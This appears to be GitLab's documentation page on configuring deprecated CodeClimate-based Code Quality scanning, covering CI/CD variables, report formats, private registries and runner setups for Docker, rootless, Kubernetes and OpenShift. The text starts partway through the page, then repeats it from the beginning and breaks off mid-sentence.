Useful for [offline scanning](https://github.com/codeclimate/codeclimate/pull/948). For more information, see [Use a private container registry](#use-a-private-container-image-registry). | | `CODECLIMATE_REGISTRY_USERNAME` | Set to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`. | | `CODECLIMATE_REGISTRY_PASSWORD` | Set to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`. | | `CODE_QUALITY_DISABLED` | Prevents the Code Quality job from running. | | `CODE_QUALITY_IMAGE` | Set to a fully prefixed image name. Image must be accessible from your job environment. | | `ENGINE_MEMORY_LIMIT_BYTES` | Set the memory limit for engines. Default: 1,024,000,000 bytes. | | `REPORT_STDOUT` | Set to print the report to `STDOUT` instead of generating the usual report file. | | `REPORT_FORMAT` | Set to control the format of the generated report file. Either `json` or `html`. | | `SOURCE_CODE` | Path to the source code to scan. Must be the absolute path to a directory where cloned sources are stored. | | `TIMEOUT_SECONDS` | Custom timeout per engine container for the `codeclimate analyze` command. Default: 900 seconds (15 minutes) | ### Output Code Quality outputs a report containing details of issues found. The content of this report is processed internally and the results shown in the UI. The report is also output as a job artifact of the `code_quality` job, named `gl-code-quality-report.json`. You can optionally output the report in HTML format. For example, you could publish the HTML format file on GitLab Pages for even easier reviewing. #### Output in JSON and HTML format To output the Code Quality report in JSON and HTML format, you create an additional job. This requires Code Quality to be run twice, once each for file format. To output the Code Quality report in HTML format, add another job to your template by using `extends: code_quality`: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality_html: extends: code_quality variables: REPORT_FORMAT: html artifacts: paths: [gl-code-quality-report.html] ``` Both the JSON and HTML files are output as job artifacts. The HTML file is contained in the `artifacts.zip` job artifact. #### Output in only HTML format To download the Code Quality report in only HTML format, set `REPORT_FORMAT` to `html`, overriding the default definition of the `code_quality` job. {{< alert type="note" >}} This does not create a JSON format file, so Code Quality results are not shown in the merge request widget, pipeline report, or changes view. {{< /alert >}} ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: REPORT_FORMAT: html artifacts: paths: [gl-code-quality-report.html] ``` The HTML file is output as a job artifact. ## Use Code Quality with merge request pipelines The default Code Quality configuration does not allow the `code_quality` job to run on [merge request pipelines](../pipelines/merge_request_pipelines.md). To enable Code Quality to run on merge request pipelines, overwrite the code quality `rules`, or [`workflow: rules`](../yaml/_index.md#workflow), so that they match your current `rules`. For example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: rules: - if: $CODE_QUALITY_DISABLED when: never - if: $CI_PIPELINE_SOURCE == "merge_request_event" # Run code quality job in merge request pipelines - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run code quality job in pipelines on the default branch (but not in other branch pipelines) - if: $CI_COMMIT_TAG # Run code quality job in pipelines for tags ``` ## Change how CodeClimate images are downloaded The CodeClimate engine downloads container images to run each of its plugins. By default, the images are downloaded from Docker Hub. You can change the image source to improve performance, work around Docker Hub rate limits, or use a private registry. ### Use the Dependency Proxy to download images You can use a Dependency Proxy to reduce the time taken to download dependencies. Prerequisites: - [Dependency Proxy](../../user/packages/dependency_proxy/_index.md) enabled in the project's group. To reference the Dependency Proxy, configure the following variables in the `.gitlab-ci.yml` file: - `CODE_QUALITY_IMAGE` - `CODECLIMATE_PREFIX` - `CODECLIMATE_REGISTRY_USERNAME` - `CODECLIMATE_REGISTRY_PASSWORD` For example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: ## You must add a trailing slash to `$CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX`. CODECLIMATE_PREFIX: $CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX/ CODECLIMATE_REGISTRY_USERNAME: $CI_DEPENDENCY_PROXY_USER CODECLIMATE_REGISTRY_PASSWORD: $CI_DEPENDENCY_PROXY_PASSWORD ``` ### Use Docker Hub with authentication You can use Docker Hub as an alternate source of the Code Quality images. Prerequisites: - Add the username and password as [protected CI/CD variables](../variables/_index.md#for-a-project) in the project. To use DockerHub, configure the following variables in the `.gitlab-ci.yml` file: - `CODECLIMATE_PREFIX` - `CODECLIMATE_REGISTRY_USERNAME` - `CODECLIMATE_REGISTRY_PASSWORD` Example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: CODECLIMATE_PREFIX: "registry-1.docker.io/" CODECLIMATE_REGISTRY_USERNAME: $DOCKERHUB_USERNAME CODECLIMATE_REGISTRY_PASSWORD: $DOCKERHUB_PASSWORD ``` ### Use a private container image registry Using a private container image registry can reduce the time taken to download images, and also reduce external dependencies. You must configure the registry prefix to be passed down to CodeClimate's subsequent `docker pull` commands for individual engines, because of the nested method of container execution. The following variables can address all of the required image pulls: - `CODE_QUALITY_IMAGE`: A fully prefixed image name that can be located anywhere accessible from your job environment. GitLab container registry can be used here to host your own copy. - `CODECLIMATE_PREFIX`: The domain of your intended container image registry. This is a configuration option supported by [CodeClimate CLI](https://github.com/codeclimate/codeclimate/pull/948). You must: - Include a trailing slash (`/`). - Not include a protocol prefix, such as `https://`. - `CODECLIMATE_REGISTRY_USERNAME`: An optional variable to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`. - `CODECLIMATE_REGISTRY_PASSWORD`: An optional variable to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`. ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: CODE_QUALITY_IMAGE: "my-private-registry.local:12345/codequality:0.85.24" CODECLIMATE_PREFIX: "my-private-registry.local:12345/" ``` This example is specific to GitLab Code Quality. For more general instructions on how to configure DinD with a registry mirror, see [Enable registry mirror for Docker-in-Docker service](../docker/using_docker_build.md#enable-registry-mirror-for-dockerdind-service). #### Required images The following images are required for the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template): - `codeclimate/codeclimate-structure:latest` - `codeclimate/codeclimate-csslint:latest` - `codeclimate/codeclimate-coffeelint:latest` - `codeclimate/codeclimate-duplication:latest` - `codeclimate/codeclimate-eslint:latest` - `codeclimate/codeclimate-fixme:latest` - `codeclimate/codeclimate-rubocop:rubocop-0-92` If you are using a custom `.codeclimate.yml` configuration file, you must add the specified plugins in your private container registry. ## Change Runner configuration CodeClimate runs separate containers for each of its analysis steps. You may need to adjust your Runner configuration so that CodeClimate-based scans can run, or so that they run faster. ### Use private runners If you have private runners, you should use this configuration for improved performance of Code Quality because: - Privileged mode is not used. - Docker-in-Docker is not used. - Docker images, including all CodeClimate images, are cached, and not re-fetched for subsequent jobs. This alternative configuration uses socket binding to share the Runner's Docker daemon with the job environment. Before implementing this configuration, consider its [limitations](../docker/using_docker_build.md#use-docker-socket-binding). To use private runners: 1. Register a new runner: ```shell $ gitlab-runner register --executor "docker" \ --docker-image="docker:latest" \ --url "https://gitlab.com/" \ --description "cq-sans-dind" \ --docker-volumes "/cache"\ --docker-volumes "/builds:/builds"\ --docker-volumes "/var/run/docker.sock:/var/run/docker.sock" \ --registration-token="<project_token>" \ --non-interactive ``` 1. **Optional, but recommended**: Set the builds directory to `/tmp/builds`, so job artifacts are periodically purged from the runner host. If you skip this step, you must clean up the default builds directory (`/builds`) yourself. You can do this by adding the following two flags to `gitlab-runner register` in the previous step. ```shell --builds-dir "/tmp/builds" --docker-volumes "/tmp/builds:/tmp/builds" # Use this instead of --docker-volumes "/builds:/builds" ``` The resulting configuration: ```toml [[runners]] name = "cq-sans-dind" url = "https://gitlab.com/" token = "<project_token>" executor = "docker" builds_dir = "/tmp/builds" [runners.docker] tls_verify = false image = "docker:latest" privileged = false disable_entrypoint_overwrite = false oom_kill_disable = false disable_cache = false volumes = ["/cache", "/var/run/docker.sock:/var/run/docker.sock", "/tmp/builds:/tmp/builds"] shm_size = 0 [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. Apply two overrides to the `code_quality` job created by the template: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: services: # Shut off Docker-in-Docker tags: - cq-sans-dind # Set this job to only run on our new specialized runner ``` Code Quality now runs in standard Docker mode. ### Run CodeClimate rootless with private runners If you are using private runners and would like to run the Code Quality scans [in rootless Docker mode](https://docs.docker.com/engine/security/rootless/) code quality requires some special changes to allow it to run properly. This may require having a runner dedicated to running only code quality jobs because changes in socket binding may cause problems in other jobs. To use a rootless private runner: 1. Register a new runner: Replace `/run/user/<gitlab-runner-user>/docker.sock` with the path to the local `docker.sock` for the `gitlab-runner` user. ```shell $ gitlab-runner register --executor "docker" \ --docker-image="docker:latest" \ --url "https://gitlab.com/" \ --description "cq-rootless" \ --tag-list "cq-rootless" \ --locked="false" \ --access-level="not_protected" \ --docker-volumes "/cache" \ --docker-volumes "/tmp/builds:/tmp/builds" \ --docker-volumes "/run/user/<gitlab-runner-user>/docker.sock:/run/user/<gitlab-runner-user>/docker.sock" \ --token "<project_token>" \ --non-interactive \ --builds-dir "/tmp/builds" \ --env "DOCKER_HOST=unix:///run/user/<gitlab-runner-user>/docker.sock" \ --docker-host "unix:///run/user/<gitlab-runner-user>/docker.sock" ``` The resulting configuration: ```toml [[runners]] name = "cq-rootless" url = "https://gitlab.com/" token = "<project_token>" executor = "docker" builds_dir = "/tmp/builds" environment = ["DOCKER_HOST=unix:///run/user/<gitlab-runner-user>/docker.sock"] [runners.docker] tls_verify = false image = "docker:latest" privileged = false disable_entrypoint_overwrite = false oom_kill_disable = false disable_cache = false volumes = ["/cache", "/run/user/<gitlab-runner-user>/docker.sock:/run/user/<gitlab-runner-user>/docker.sock", "/tmp/builds:/tmp/builds"] shm_size = 0 host = "unix:///run/user/<gitlab-runner-user>/docker.sock" [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. Apply the following overrides to the `code_quality` job created by the template: ```yaml code_quality: services: variables: DOCKER_SOCKET_PATH: /run/user/997/docker.sock tags: - cq-rootless ``` Code Quality now runs in standard Docker mode and rootless. The same configuration is required if your goal is to [use rootless Podman to run Docker](https://docs.gitlab.com/runner/executors/docker.html#use-podman-to-run-docker-commands) with code quality. Make sure to replace `/run/user/<gitlab-runner-user>/docker.sock` with the correct `podman.sock` path in your system, for example: `/run/user/<gitlab-runner-user>/podman/podman.sock`. ### Configure Kubernetes or OpenShift runners You must set up Docker in a Docker container (Docker-in-Docker) to use Code Quality. The Kubernetes executor [supports Docker-in-Docker](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind). To ensure Code Quality jobs can run on a Kubernetes executor: - If you're using TLS to communicate with the Docker daemon, the executor [must be running in privileged mode](https://docs.gitlab.com/runner/executors/kubernetes/#other-configtoml-settings). Additionally, the certificate directory must be [specified as a volume mount](../docker/using_docker_build.md#docker-in-docker-with-tls-enabled-in-kubernetes). - It is possible that the DinD service doesn't start up fully before the Code Quality job starts. This is a limitation documented in [Troubleshooting the Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/troubleshooting.html#docker-cannot-connect-to-the-docker-daemon-at-tcpdocker2375-is-the-docker-daemon-running). To resolve the issue, use `before_script` to wait for the Docker daemon to fully boot up. For an example, see the configuration in the `.gitlab-ci.yml` file described in the following section. #### Kubernetes To run Code Quality in Kubernetes: - The Docker in Docker service must be added as a service container in the `config.toml` file. - The Docker daemon in the service container must listen on a TCP and UNIX socket, as both sockets are required by Code Quality. - The Docker socket must be shared with a volume. Due to a [Docker requirement](https://docs.docker.com/reference/cli/docker/container/run/#privileged), the privileged flag must be enabled for the service container. ```toml [runners.kubernetes] [runners.kubernetes.service_container_security_context] privileged = true allow_privilege_escalation = true [runners.kubernetes.volumes] [[runners.kubernetes.volumes.empty_dir]] mount_path = "/var/run/" name = "docker-sock" [[runners.kubernetes.services]] alias = "dind" command = [ "--host=tcp://0.0.0.0:2375", "--host=unix://var/run/docker.sock", "--storage-driver=overlay2" ] entrypoint = ["dockerd"] name = "docker:20.10.12-dind" ``` {{< alert type="note" >}} If you use the [GitLab Runner Helm Chart](https://docs.gitlab.com/runner/install/kubernetes.html), you can use the previous Kubernetes configuration in the [`config` field](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html) of the `values.yaml` file. x {{< /alert >}} To ensure that you use the `overlay2` [storage driver](https://docs.docker.com/storage/storagedriver/select-storage-driver/), which offers the best overall performance: - Specify the `DOCKER_HOST` that the Docker CLI communicates with. - Set the `DOCKER_DRIVER` variable to empty. Use the `before_script` section to wait for the Docker daemon to fully boot up. Since GitLab Runner v16.9, this can also be done [by just setting the `HEALTHCHECK_TCP_PORT` variable](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services). ```yaml include: - template: Code-Quality.gitlab-ci.yml code_quality: services: [] variables: DOCKER_HOST: tcp://dind:2375 DOCKER_DRIVER: "" before_script: - while ! docker info > /dev/null 2>&1; do sleep 1; done ``` #### OpenShift For OpenShift, you should use the [GitLab Runner Operator](https://docs.gitlab.com/runner/install/operator.html). To give the Docker daemon in the service container permissions to initialize its storage, you must mount the `/var/lib` directory as a volume mount. {{< alert type="note" >}} If you cannot to mount the `/var/lib` directory as a volume mount, you can set `--storage-driver` to `vfs` instead. If you opt for the `vfs` value, it might have a negative impact on [performance](https://docs.docker.com/storage/storagedriver/select-storage-driver/). {{< /alert >}} To configure permissions for the Docker daemon: 1. Create a `config.toml` file with this configuration template to customize the runner's configuration: ```toml [[runners]] [runners.kubernetes] [runners.kubernetes.service_container_security_context] privileged = true allow_privilege_escalation = true [runners.kubernetes.volumes] [[runners.kubernetes.volumes.empty_dir]] mount_path = "/var/run/" name = "docker-sock" [[runners.kubernetes.volumes.empty_dir]] mount_path = "/var/lib/" name = "docker-data" [[runners.kubernetes.services]] alias = "dind" command = [ "--host=tcp://0.0.0.0:2375", "--host=unix://var/run/docker.sock", "--storage-driver=overlay2" ] entrypoint = ["dockerd"] name = "docker:20.10.12-dind" ``` 1. [Set the custom configuration to your runner](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#customize-configtoml-with-a-configuration-template). 1. Optional. Attach a [`privileged` service account](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html) to the build Pod. This depends on your OpenShift cluster setup: ```shell oc create sa dind-sa oc adm policy add-scc-to-user anyuid -z dind-sa oc adm policy add-scc-to-user -z dind-sa privileged ``` 1. Set the permissions in the [`[runners.kubernetes]` section](https://docs.gitlab.com/runner/executors/kubernetes/#other-configtoml-settings). 1. Set the job definition stays the same as in Kubernetes case: ```yaml include: - template: Code-Quality.gitlab-ci.yml code_quality: services: [] variables: DOCKER_HOST: tcp://dind:2375 DOCKER_DRIVER: "" before_script: - while ! docker info > /dev/null 2>&1; do sleep 1; done ``` #### Volumes and Docker storage Docker stores all of its data in the `/var/lib` volume, which could result in a large volume. To reuse Docker-in-Docker storage across the cluster, you can use [Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/) as an alternative. <!--- end_remove -->
--- stage: Application Security Testing group: Static Analysis info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Configure CodeClimate-based Code Quality scanning (deprecated) breadcrumbs: - doc - ci - testing --- <!--- start_remove The following content will be removed on remove_date: '2025-08-15' --> {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](code_quality.md#import-code-quality-results-from-a-cicd-job) instead. This change is a breaking change. {{< /alert >}} Code Quality includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine. The CodeClimate engine runs: - Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability). - A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code. ## Enable CodeClimate-based scanning Prerequisites: - GitLab CI/CD configuration (`.gitlab-ci.yml`) must include the `test` stage. - If you're using instance runners, the Code Quality job must be configured for the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). When using this workflow, the `/builds` volume must be mapped to allow reports to be saved. - If you're using private runners, you should use an [alternative configuration](#use-private-runners) recommended for running Code Quality analysis more efficiently. - The runner must have enough disk space to store the generated Code Quality files. For example, on the [GitLab project](https://gitlab.com/gitlab-org/gitlab) the files are approximately 7 GB. To enable Code Quality, either: - Enable [Auto DevOps](../../topics/autodevops/_index.md), which includes [Auto Code Quality](../../topics/autodevops/stages.md#auto-code-quality). - Include the [Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml) in your `.gitlab-ci.yml` file. Example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml ``` Code Quality now runs in pipelines. {{< alert type="warning" >}} On GitLab Self-Managed, if a malicious actor compromises the Code Quality job definition they could execute privileged Docker commands on the runner host. Having proper access control policies mitigates this attack vector by allowing access only to trusted actors. {{< /alert >}} ## Disable CodeClimate-based scanning The `code_quality` job doesn't run if the `$CODE_QUALITY_DISABLED` CI/CD variable is present. For more information about how to define a variable, see [GitLab CI/CD variables](../variables/_index.md). To disable Code Quality, create a custom CI/CD variable named `CODE_QUALITY_DISABLED`, for either: - [The whole project](../variables/_index.md#for-a-project). - [A single pipeline](../pipelines/_index.md#run-a-pipeline-manually). ## Configure CodeClimate analysis plugins By default, the `code_quality` job configures CodeClimate to: - Use [a specific set of plugins](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template?ref_type=heads). - Use [default configurations](https://gitlab.com/gitlab-org/ci-cd/codequality/-/tree/master/codeclimate_defaults?ref_type=heads) for those plugins. To scan more languages, you can enable more [plugins](https://docs.codeclimate.com/docs/list-of-engines). You can also disable plugins that the `code_quality` job enables by default. For example, to use the [SonarJava analyzer](https://docs.codeclimate.com/docs/sonar-java): 1. Add a file named `.codeclimate.yml` to the root of your repository 1. Add the [enablement code](https://docs.codeclimate.com/docs/sonar-java#enable-the-plugin) for the plugin to the root of your repository to the `.codeclimate.yml` file: ```yaml version: "2" plugins: sonar-java: enabled: true ``` This adds SonarJava to the `plugins:` section of the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) included in your project. Changes to the `plugins:` section do not affect the `exclude_patterns` section of the default `.codeclimate.yml`. See the Code Climate documentation on [excluding files and folders](https://docs.codeclimate.com/docs/excluding-files-and-folders) for more details. ## Customize scan job settings You can change the behavior of the `code_quality` scan job by setting [CI/CD variables](#available-cicd-variables) in your GitLab CI/CD YAML. To configure the Code Quality job: 1. Declare a job with the same name as the Code Quality job, after the template's inclusion. 1. Specify additional keys in the job's stanza. For an example, see [Download output in HTML format](#output-in-only-html-format). ### Available CI/CD variables Code Quality can be customized by defining available CI/CD variables: | CI/CD variable | Description | |---------------------------------|-------------| | `CODECLIMATE_DEBUG` | Set to enable [Code Climate debug mode](https://github.com/codeclimate/codeclimate#environment-variables). | | `CODECLIMATE_DEV` | Set to enable `--dev` mode which lets you run engines not known to the CLI. | | `CODECLIMATE_PREFIX` | Set a prefix to use with all `docker pull` commands in CodeClimate engines. Useful for [offline scanning](https://github.com/codeclimate/codeclimate/pull/948). For more information, see [Use a private container registry](#use-a-private-container-image-registry). | | `CODECLIMATE_REGISTRY_USERNAME` | Set to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`. | | `CODECLIMATE_REGISTRY_PASSWORD` | Set to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`. | | `CODE_QUALITY_DISABLED` | Prevents the Code Quality job from running. | | `CODE_QUALITY_IMAGE` | Set to a fully prefixed image name. Image must be accessible from your job environment. | | `ENGINE_MEMORY_LIMIT_BYTES` | Set the memory limit for engines. Default: 1,024,000,000 bytes. | | `REPORT_STDOUT` | Set to print the report to `STDOUT` instead of generating the usual report file. | | `REPORT_FORMAT` | Set to control the format of the generated report file. Either `json` or `html`. | | `SOURCE_CODE` | Path to the source code to scan. Must be the absolute path to a directory where cloned sources are stored. | | `TIMEOUT_SECONDS` | Custom timeout per engine container for the `codeclimate analyze` command. Default: 900 seconds (15 minutes) | ### Output Code Quality outputs a report containing details of issues found. The content of this report is processed internally and the results shown in the UI. The report is also output as a job artifact of the `code_quality` job, named `gl-code-quality-report.json`. You can optionally output the report in HTML format. For example, you could publish the HTML format file on GitLab Pages for even easier reviewing. #### Output in JSON and HTML format To output the Code Quality report in JSON and HTML format, you create an additional job. This requires Code Quality to be run twice, once each for file format. To output the Code Quality report in HTML format, add another job to your template by using `extends: code_quality`: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality_html: extends: code_quality variables: REPORT_FORMAT: html artifacts: paths: [gl-code-quality-report.html] ``` Both the JSON and HTML files are output as job artifacts. The HTML file is contained in the `artifacts.zip` job artifact. #### Output in only HTML format To download the Code Quality report in only HTML format, set `REPORT_FORMAT` to `html`, overriding the default definition of the `code_quality` job. {{< alert type="note" >}} This does not create a JSON format file, so Code Quality results are not shown in the merge request widget, pipeline report, or changes view. {{< /alert >}} ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: REPORT_FORMAT: html artifacts: paths: [gl-code-quality-report.html] ``` The HTML file is output as a job artifact. ## Use Code Quality with merge request pipelines The default Code Quality configuration does not allow the `code_quality` job to run on [merge request pipelines](../pipelines/merge_request_pipelines.md). To enable Code Quality to run on merge request pipelines, overwrite the code quality `rules`, or [`workflow: rules`](../yaml/_index.md#workflow), so that they match your current `rules`. For example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: rules: - if: $CODE_QUALITY_DISABLED when: never - if: $CI_PIPELINE_SOURCE == "merge_request_event" # Run code quality job in merge request pipelines - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run code quality job in pipelines on the default branch (but not in other branch pipelines) - if: $CI_COMMIT_TAG # Run code quality job in pipelines for tags ``` ## Change how CodeClimate images are downloaded The CodeClimate engine downloads container images to run each of its plugins. By default, the images are downloaded from Docker Hub. You can change the image source to improve performance, work around Docker Hub rate limits, or use a private registry. ### Use the Dependency Proxy to download images You can use a Dependency Proxy to reduce the time taken to download dependencies. Prerequisites: - [Dependency Proxy](../../user/packages/dependency_proxy/_index.md) enabled in the project's group. To reference the Dependency Proxy, configure the following variables in the `.gitlab-ci.yml` file: - `CODE_QUALITY_IMAGE` - `CODECLIMATE_PREFIX` - `CODECLIMATE_REGISTRY_USERNAME` - `CODECLIMATE_REGISTRY_PASSWORD` For example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: ## You must add a trailing slash to `$CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX`. CODECLIMATE_PREFIX: $CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX/ CODECLIMATE_REGISTRY_USERNAME: $CI_DEPENDENCY_PROXY_USER CODECLIMATE_REGISTRY_PASSWORD: $CI_DEPENDENCY_PROXY_PASSWORD ``` ### Use Docker Hub with authentication You can use Docker Hub as an alternate source of the Code Quality images. Prerequisites: - Add the username and password as [protected CI/CD variables](../variables/_index.md#for-a-project) in the project. To use DockerHub, configure the following variables in the `.gitlab-ci.yml` file: - `CODECLIMATE_PREFIX` - `CODECLIMATE_REGISTRY_USERNAME` - `CODECLIMATE_REGISTRY_PASSWORD` Example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: CODECLIMATE_PREFIX: "registry-1.docker.io/" CODECLIMATE_REGISTRY_USERNAME: $DOCKERHUB_USERNAME CODECLIMATE_REGISTRY_PASSWORD: $DOCKERHUB_PASSWORD ``` ### Use a private container image registry Using a private container image registry can reduce the time taken to download images, and also reduce external dependencies. You must configure the registry prefix to be passed down to CodeClimate's subsequent `docker pull` commands for individual engines, because of the nested method of container execution. The following variables can address all of the required image pulls: - `CODE_QUALITY_IMAGE`: A fully prefixed image name that can be located anywhere accessible from your job environment. GitLab container registry can be used here to host your own copy. - `CODECLIMATE_PREFIX`: The domain of your intended container image registry. This is a configuration option supported by [CodeClimate CLI](https://github.com/codeclimate/codeclimate/pull/948). You must: - Include a trailing slash (`/`). - Not include a protocol prefix, such as `https://`. - `CODECLIMATE_REGISTRY_USERNAME`: An optional variable to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`. - `CODECLIMATE_REGISTRY_PASSWORD`: An optional variable to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`. ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: variables: CODE_QUALITY_IMAGE: "my-private-registry.local:12345/codequality:0.85.24" CODECLIMATE_PREFIX: "my-private-registry.local:12345/" ``` This example is specific to GitLab Code Quality. For more general instructions on how to configure DinD with a registry mirror, see [Enable registry mirror for Docker-in-Docker service](../docker/using_docker_build.md#enable-registry-mirror-for-dockerdind-service). #### Required images The following images are required for the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template): - `codeclimate/codeclimate-structure:latest` - `codeclimate/codeclimate-csslint:latest` - `codeclimate/codeclimate-coffeelint:latest` - `codeclimate/codeclimate-duplication:latest` - `codeclimate/codeclimate-eslint:latest` - `codeclimate/codeclimate-fixme:latest` - `codeclimate/codeclimate-rubocop:rubocop-0-92` If you are using a custom `.codeclimate.yml` configuration file, you must add the specified plugins in your private container registry. ## Change Runner configuration CodeClimate runs separate containers for each of its analysis steps. You may need to adjust your Runner configuration so that CodeClimate-based scans can run, or so that they run faster. ### Use private runners If you have private runners, you should use this configuration for improved performance of Code Quality because: - Privileged mode is not used. - Docker-in-Docker is not used. - Docker images, including all CodeClimate images, are cached, and not re-fetched for subsequent jobs. This alternative configuration uses socket binding to share the Runner's Docker daemon with the job environment. Before implementing this configuration, consider its [limitations](../docker/using_docker_build.md#use-docker-socket-binding). To use private runners: 1. Register a new runner: ```shell $ gitlab-runner register --executor "docker" \ --docker-image="docker:latest" \ --url "https://gitlab.com/" \ --description "cq-sans-dind" \ --docker-volumes "/cache"\ --docker-volumes "/builds:/builds"\ --docker-volumes "/var/run/docker.sock:/var/run/docker.sock" \ --registration-token="<project_token>" \ --non-interactive ``` 1. **Optional, but recommended**: Set the builds directory to `/tmp/builds`, so job artifacts are periodically purged from the runner host. If you skip this step, you must clean up the default builds directory (`/builds`) yourself. You can do this by adding the following two flags to `gitlab-runner register` in the previous step. ```shell --builds-dir "/tmp/builds" --docker-volumes "/tmp/builds:/tmp/builds" # Use this instead of --docker-volumes "/builds:/builds" ``` The resulting configuration: ```toml [[runners]] name = "cq-sans-dind" url = "https://gitlab.com/" token = "<project_token>" executor = "docker" builds_dir = "/tmp/builds" [runners.docker] tls_verify = false image = "docker:latest" privileged = false disable_entrypoint_overwrite = false oom_kill_disable = false disable_cache = false volumes = ["/cache", "/var/run/docker.sock:/var/run/docker.sock", "/tmp/builds:/tmp/builds"] shm_size = 0 [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. Apply two overrides to the `code_quality` job created by the template: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality: services: # Shut off Docker-in-Docker tags: - cq-sans-dind # Set this job to only run on our new specialized runner ``` Code Quality now runs in standard Docker mode. ### Run CodeClimate rootless with private runners If you are using private runners and would like to run the Code Quality scans [in rootless Docker mode](https://docs.docker.com/engine/security/rootless/) code quality requires some special changes to allow it to run properly. This may require having a runner dedicated to running only code quality jobs because changes in socket binding may cause problems in other jobs. To use a rootless private runner: 1. Register a new runner: Replace `/run/user/<gitlab-runner-user>/docker.sock` with the path to the local `docker.sock` for the `gitlab-runner` user. ```shell $ gitlab-runner register --executor "docker" \ --docker-image="docker:latest" \ --url "https://gitlab.com/" \ --description "cq-rootless" \ --tag-list "cq-rootless" \ --locked="false" \ --access-level="not_protected" \ --docker-volumes "/cache" \ --docker-volumes "/tmp/builds:/tmp/builds" \ --docker-volumes "/run/user/<gitlab-runner-user>/docker.sock:/run/user/<gitlab-runner-user>/docker.sock" \ --token "<project_token>" \ --non-interactive \ --builds-dir "/tmp/builds" \ --env "DOCKER_HOST=unix:///run/user/<gitlab-runner-user>/docker.sock" \ --docker-host "unix:///run/user/<gitlab-runner-user>/docker.sock" ``` The resulting configuration: ```toml [[runners]] name = "cq-rootless" url = "https://gitlab.com/" token = "<project_token>" executor = "docker" builds_dir = "/tmp/builds" environment = ["DOCKER_HOST=unix:///run/user/<gitlab-runner-user>/docker.sock"] [runners.docker] tls_verify = false image = "docker:latest" privileged = false disable_entrypoint_overwrite = false oom_kill_disable = false disable_cache = false volumes = ["/cache", "/run/user/<gitlab-runner-user>/docker.sock:/run/user/<gitlab-runner-user>/docker.sock", "/tmp/builds:/tmp/builds"] shm_size = 0 host = "unix:///run/user/<gitlab-runner-user>/docker.sock" [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. Apply the following overrides to the `code_quality` job created by the template: ```yaml code_quality: services: variables: DOCKER_SOCKET_PATH: /run/user/997/docker.sock tags: - cq-rootless ``` Code Quality now runs in standard Docker mode and rootless. The same configuration is required if your goal is to [use rootless Podman to run Docker](https://docs.gitlab.com/runner/executors/docker.html#use-podman-to-run-docker-commands) with code quality. Make sure to replace `/run/user/<gitlab-runner-user>/docker.sock` with the correct `podman.sock` path in your system, for example: `/run/user/<gitlab-runner-user>/podman/podman.sock`. ### Configure Kubernetes or OpenShift runners You must set up Docker in a Docker container (Docker-in-Docker) to use Code Quality. The Kubernetes executor [supports 